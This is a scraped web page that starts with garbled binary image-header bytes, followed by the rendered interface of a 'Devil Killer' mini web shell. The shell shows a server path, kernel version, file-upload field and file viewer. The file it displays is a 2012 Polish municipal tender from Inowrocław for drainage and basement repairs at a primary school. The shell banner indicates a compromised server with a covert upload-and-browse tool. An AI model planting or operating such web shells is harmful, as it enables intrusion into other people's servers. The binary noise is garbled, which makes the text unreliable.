JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120827/316400-N-2012.html

<p class="kh_header"><b>Inowrocław: BUDOWA KANALIZACJI DESZCZOWEJ I DRENAŻU OPASKOWEGO, IZOLACJA PIONOWA ŚCIAN PIWNIC ORAZ WZMOCNIENIE I WYMIANA ELEMENTÓW KONSTRUKCYJNYCH W PIWNICY BUDYNKU SZKOŁY PODSTAWOWEJ NR 10 W INOWROCŁAWIU PRZY UL. PRZYBYSZEWSKIEGO 119 I 123</b><br>
<b>Numer ogłoszenia: 316400 - 2012; data zamieszczenia: 27.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Inowrocław , ul. F. D. Roosevelta 36, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3555250, faks 52 3555233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.inowroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA KANALIZACJI DESZCZOWEJ I DRENAŻU OPASKOWEGO, IZOLACJA PIONOWA ŚCIAN PIWNIC ORAZ WZMOCNIENIE I WYMIANA ELEMENTÓW KONSTRUKCYJNYCH W PIWNICY BUDYNKU SZKOŁY PODSTAWOWEJ NR 10 W INOWROCŁAWIU PRZY UL. PRZYBYSZEWSKIEGO 119 I 123.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Budowa kanalizacji deszczowej i drenażu opaskowego, izolacja pionowa ścian piwnic oraz wzmocnienie i wymiana elementów konstrukcyjnych w piwnicy budynku Szkoły Podstawowej nr 10 w Inowrocławiu przy ul. Przybyszewskiego 119 i 123, zgodnie z dokumentacją projektową i specyfikacją techniczną wykonania i odbioru robót, które stanowią załączniki do niniejszej SIWZ

Przedmiot zamówienia obejmuje:
I) W zakresie branży konstrukcyjnej: a) wzmocnienie stropu: rozbiórka fragmentów posadzek o wymiarach 1,0x1,0m po wytyczeniu położenia projektowanych stóp fundamentowych; wykonanie wykopu pod stopy fundamentowe o wymiarach podstawy 50x50cm; wykonanie stóp fundamentowych z betonu B20; na górnej powierzchni stóp należy zatopić marki stalowe M-1; uzupełnić warstwy podłogowe; oczyścić z rdzy dolne stopki belek stropowych i powlec mlekiem cementowym; pod istniejącymi belkami stropowymi należy zamontować na tymczasowych stemplach rozstawionych co 80-100cm belki z rur prostokątnych 100x50x4 (St3SX). Pomiędzy starymi a nowymi belkami umieścić w miejscach projektowanych słupów i zastrzałów oraz pośrednio przekładki stalowe z blach; w przypadku poz.1 i 2 pomiędzy nowymi belkami, a markami stalowymi wspawać słupy z rur kwadratowych 60x60x3mm; wykuć gniazda w ścianach; osadzić zastrzały łącząc je poprzez spawanie z belką; zabetonować gniazda dokładnie ubijając mieszankę betonową B15; szczelinę pomiędzy belkami wypełnić gęstą zaprawą cementową marki M15. Po związaniu zaprawy zdemontować stemplowanie; elementy stalowe należy oczyścić do stopnia St2 i zabezpieczyć antykorozyjnie poprzez dwukrotne malowanie emalią antykorozyjną. Wymagany stopień czystości powierzchni St 2.
b) wymiana nadproży: wykonanie stemplowania nadproży poza obrysem wymienianych belek oraz belek stropowych w przypadku, gdy opierają się one bezpośrednio na belkach nadprożowych; demontaż (wykucie z muru) istniejących belek nadprożowych; w miejscu zdemontowanych belek dwuteowych o wysokości 80mm (nadproża okienne) należy zamontować belki z rur prostokątnych 40x80x4mm (St3SX). W miejscu zdemontowanych belek dwuteowych o wysokości 100mm (nadproża drzwiowe) należy zamontować belki z rur kwadratowych 50x100x4mm (St3SX). Belki należy oprzeć na murze zapewniając głębokość oparcia min. 20cm na stronę; po zastabilizowaniu belki wszelkie szczeliny wypełnić zaprawą cementową marki M15; zdemontować stemplowanie; elementy stalowe należy oczyścić do stopnia St2 i zabezpieczyć antykorozyjnie poprzez dwukrotne malowanie emalią antykorozyjną. Wymagany stopień czystości powierzchni St 2; w przypadku poz. 6 należy pozostawić istniejącą belkę. Dostępną powierzchnię stalową należy oczyścić do stopnia St2 i zabezpieczyć antykorozyjnie poprzez dwukrotne malowanie emalią antykorozyjną.
c) wykonanie izolacji pionowej ścian piwnic: rozbiórka nawierzchni z kostki betonowej oraz kostki granitowej, a następnie wykonanie wzdłuż ścian wykopu o głębokości ok. 1,6 i 2,0m (roboty te są ściśle powiązane z projektowanym drenażem i instalacją kanalizacji deszczowej); oczyszczenie mechaniczne powierzchni ściany z wszelkich zanieczyszczeń; wszelkie ubytki podłoża uzupełnić tynkiem CW kategorii II; na połączeniu ściany z ławą fundamentową wykonać wyokrąglenie naroża o promieniu 5cm z zaprawy cementowej M10; zagruntować podłoże za pomocą dyspersyjnej masy asfaltowo-kauczukowej rozcieńczonej wodą 1:1 (zużycie ok. 0,2 kg/m2); wykonanie hydroizolacji powłokowej o łącznej grubości nie mniejszej niż 3 mm za pomocą dyspersyjnej masy asfaltowo-kauczukowej (zużycie ok. 4,5 kg/m2). Izolację nanosić w dwóch warstwach, przy czym grubość każdej z nich nie może przekraczać 2 mm; wykonać dodatkową izolację ściany z foli wytłaczanej (kubełkowej); zasypać wykop i zagęścić grunt; wykonać warstwę odsączająca z piasku gr. 12cm oraz odtworzyć rozebrane nawierzchnie utwardzone z kostki betonowej i granitowej na podsypce cementowo - piaskowej gr. 4cm; 
II) W zakresie branży instalacyjnej - sanitarnej:
a) drenaż opaskowy: ciągi drenarskie układane będą równolegle, w odległości w planie nie większej niż 0,5m, do ścian zewnętrznych budynku, w poziomie fundamentów ze spadkiem minimalnym 0,3%, zgodnie z załączonymi rysunkami. W miejscach połączeń i załamań trasy drenażu zaprojektowano studzienki  tworzywowe, kontrolno - rewizyjne O315mm. Studzienki należy przykryć włazem żeliwnym klasy B125; drenaż opaskowy zaprojektowano z rur drenarskich PVC - U O126/O113 z filtrem z włókna kokosowego. Rurki drenarskie należy układać w warstwie filtracyjnej, o grubości 30cm, wykonanej ze żwiru lub kruszywa łamanego o frakcji 8 ÷ 10mm. Warstwę filtracyjną odciąć od gruntu rodzimego geowłókniną o wodoprzepuszczalności minimalnej 70 dm3/m2 x s, przy ciśnieniu 10cm sł. wody; ciągi drenarskie włączyć do projektowanej kanalizacji deszczowej. Przed włączeniem na kanale zbiorczym w studzienkach rewizyjnych betonowych O1000 zabudować klapy zwrotne O160.
b) kanalizacja deszczowa: kanalizację deszczową na terenie posesji szkoły zaprojektowano z rur kanalizacyjnych gładkich PVC - U klasy S ze ścianką litą, o sztywności obwodowej 8kN/m2 - SN 8, SDR 34, zgodnych z PN - EN 1401 - 01:1999; przyłącza kanalizacji deszczowej zaprojektowano z rur kamionkowych zgodnych z PN EN 295; rury kanalizacyjne należy układać w wykopie w sposób zgodny z instrukcjami montażu producenta, zgodnie z PN - EN 1610:2001, oraz zgodnie z warunkami technicznymi wykonania i odbioru sieci określonymi w dokumentacji projektowej; przyłącza kanalizacji deszczowej od studni osadnikowych na terenie posesji do studni kanalizacyjnych w ulicach Przybyszewskiego i Wielkopolskiej wykonać metodą przewiertu sterowanego; wody opadowe z rur spustowych RS1 i RS2 budynku A należy odprowadzić do projektowanych wpustów deszczowych WD1 i WD2. Teren pomiędzy wylotami rur spustowych i wspustami należy wybrukować i wyprofilować. Kostkę ułożyć na warstwie podbudowy z betonu, uniemożliwiającej migrację wód opadowych w głąb gruntu; zaprojektowano studnie deszczowe bez zasyfonowania, tworzywowe O315 z rurą trzonową karbowaną PVC - U SN4 i rurą teleskopową z wpustami ulicznymi żeliwnymi klasy B125 z osadnikiem o głębokości części osadczej H=0,95m; włączenie pozostałych rur spustowych z obu budynków włączyć do projektowanej kanalizacji deszczowej. Końcowe odcinki rur spustowych do wysokości 2,0m ponad teren wymienić z istniejących ocynkowanych na żeliwne Dn125, włączenie do kanalizacji deszczowej wykonać poprzez osadniki deszczowe Dn150. Końcowe odcinki rur spustowych Rs1 i Rs2 w budynku A do wysokości 2,0m ponad teren wymienić na podrynnniki żeliwne Dn125; na kanalizacji deszczowej zaprojektowano studnie inspekcyjne, rewizyjne i osadnikowe. Studnie inspekcyjne O425, tworzywowe z rurą trzonową PP SN4 i rurą teleskopową, zwieńczone włazem żeliwnym B125. Typy kinet wg zestawienia w części rysunkowej. Studnie rewizyjne, żelbetowe O1000 do zabudowy klap zwrotnych O160. Studnie wykonać z kręgów betonowych łączonych na uszczelki, z pełnym dnem. Studnie ustawić w gotowym wykopie na ustabilizowanym podłożu piaskowo - cementowym o grubości 30cm, bezpośrednio pod kręgiem dennym wykonać podkład z chudego betonu o grubości 15cm. Studnię przykryć płytą żelbetową pokrywową opartą na pierścieniu betonowym odciążającym i wyposażyć w stopnie włazowe. Na płycie pokrywowej osadzić właz żeliwny klasy B125 zgodny z PN EN-124:2000. Właz dopasować do rzędnej istniejącej nawierzchni. Połączenia kręgów od zewnątrz uszczelnić zaprawą cementową. Studzienkę na całej wysokości zaizolować przeciwwilgociowo. Studnie osadnikowe, żelbetowe O1000 z częścią osadczą o wysokości 1,0m. Studnie wykonać z kręgów betonowych łączonych na uszczelki, z pełnym dnem. Studnie ustawić w gotowym wykopie na ustabilizowanym podłożu piaskowo - cementowym o grubości 30cm, bezpośrednio pod kręgiem dennym wykonać podkład z chudego betonu o grubości 15cm. Studnię przykryć płytą żelbetową pokrywową opartą na pierścieniu betonowym odciążającym i wyposażyć w stopnie włazowe. Na płycie pokrywowej osadzić właz żeliwny klasy B125 zgodny z PN EN-124:2000. Właz dopasować do rzędnej istniejącej nawierzchni. Połączenia kręgów od zewnątrz uszczelnić zaprawą cementową. Studzienkę na całej wysokości zaizolować przeciwwilgociowo; przyłącza kanalizacyjne od studni osadnikowych do istniejących studni na kanalizacji deszczowej (Di1, Di2) na całej długości w pasie drogowym ulicy Przybyszewskiego i Wielkoploskiej zgodnie z decyzją na umieszczenie infrastruktury technicznej niezwiązanej z potrzebami zarządzania drogami lub potrzebami ruch drogowego wykonać metodą przewiertu poprzecznego z zastosowaniem rury osłonowej HDPE O355.
c) wykopy: wykopy otwarte dla przewodów kanalizacyjnych wykonać zgodnie z warunkami technicznymi podanymi w PN - B - 10736. Wykopy otwarte dla elementów uzbrojenia terenu wykonać jako jamiste. Roboty ziemne prowadzić sposobem mechanicznym i ręcznym. Wykonać wykopy o ścianach pionowych obustronnie odeskowanych. Wykopy prowadzić od najniższego punktu danej sieci. Wydobywaną ziemię na odkład składować wzdłuż wykopu w odległości 1,0m od jego krawędzi. Grunt rodzimy nie nadający się do zasypywania wykopów wywieźć poza teren budowy, zgodnie z dyspozycjami inspektora nadzoru inwestorskiego; umocnienia ścian wykopu wykonać z zastosowaniem wyprasek ułożonych poziomo i opartych o ściany wykopu, bali pionowych oraz okrąglaków stanowiących poprzeczne rozpory; szerokość dna wykopu w poziomie osi pojedynczego rurociągu wynosi 70cm. Przy ustalaniu głębokości wykopu na podstawie profilu rurociągu należy uwzględnić grubość podsypki - 10cm.; jeżeli w poziomie posadowienia występować będą elementy mogące uszkodzić rurę przewodową - grunt zbrylony, kamienie, gruz, śmieci - należy je usunąć, a powstałe ubytki uzupełnić materiałem podsypki (zgodnie z dokumentacją projektową).
d) roboty związane: wykonanie robót związanych z ułożeniem drenażu opaskowego i kanalizacji deszczowej wymaga demontażu i ponownego montażu nawierzchni z kostki brukowej i nawierzchni asfaltowych. Po wykonaniu robót nawierzchnię należy odbudować wykorzystując zdemontowaną kostkę, pod warunkiem że nie uległa zniszczeniu. Materiał nie nadający się do ponownego użycia należy zastąpić nowym o identycznych lub zbliżonych (lecz jakościowo nie gorszych parametrach). Tereny zielone, na których prowadzone będą prace należy odtworzyć - grunt zrekultywować i założyć trawnik.
e) wykonanie dokumentacji powykonawczej inwentaryzacyjnej - geodezyjnej.

Szczegółowy opis elementów przedmiotu zamówienia stanowią załączniki: Załącznik Nr 1 do SIWZ	Specyfikacja techniczna wykonania i odbioru robót budowlanych; Załącznik Nr 2 do SIWZ	Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót budowlanych; Załącznik Nr 3 do SIWZ	 Dokumentacja projektowa; Załącznik Nr 4 do SIWZ Przedmiar robót

Wymagany okres gwarancji na: wykonane roboty (materiały oraz robociznę) wynosi 36 miesięcy, od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.

Każdy z wykonawców winien dokonać oględzin miejsca budowy na etapie sporządzania oferty celem sprawdzenia warunków panujących na obiekcie. Z uwagi na ryczałtowy charakter zamówienia w ofercie należy uwzględnić wszystkie dodatkowe opłaty związane z wykonywanymi robotami, a wynikającymi z zakresu robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.23.13.00-8, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej wykonali i prawidłowo ukończyli co najmniej:
jedną robotę budowlaną dotyczącą wykonania prac konstrukcyjno - budowlanych obejmujących wymianę elementów konstrukcyjnych oraz wykonanie izolacji ścian na kwotę nie mniejszą niż 25.000,00 zł brutto; jedną robotę budowlaną dotyczącą budowy kanalizacji deszczowej i drenażu opaskowego na kwotę nie mniejszą niż 95.000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. dysponują osobami, które będą wykonywać zamówienie lub pisemnym zobowiązaniem innych podmiotów do udostępnienia tych osób, w tym posiadającymi uprawnienia do kierowania robotami budowlanymi o specjalności  konstrukcyjno-budowlanej i w zakresie instalacyjnej - sanitarnej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. posiadają środki finansowe (lub zdolność kredytową) w wysokości co najmniej: 120.000,00 PLN (słownie: sto dwadzieścia  tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) FORMULARZ OFERTOWY, którego zalecany wzorzec został zawarty w Załączniku nr 9 do SIWZ; b) KOSZTORYS OFERTOWY, który może być sporządzony metodą uproszczoną</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach: 1) gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT); 2) konieczności zmiany terminu realizacji w związku z: a) wprowadzeniem zmian w dokumentacji projektowej, a wynikających z potrzeby dostosowania zakresu zadania do wytycznych programowych lub powszechnie obowiązujących przepisów prawa lub b) z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych lub c) działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub d) nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazaniem przez Zamawiającego terenu budowy Wykonawcy lub e) wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę lub f) opóźnieniem związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów lub g) innymi okolicznościami niepowstałymi z winy Wykonawcy lub h) koniecznością wykonania zamówień dodatkowych; 3) zmiany warunków finansowania przedmiotu umowy uzasadnionej zmianami w budżecie Zamawiającego. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.inowroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zespół Ekonomiczno-Administracyjny Szkół w Inowrocławiu, 88-100 Inowrocław, ul. Kiełbasiewicza 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2012 godzina 10:00, miejsce: Miejski Zespół Ekonomiczno-Administracyjny Szkół w Inowrocławiu, 88-100 Inowrocław, ul. Kiełbasiewicza 7, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




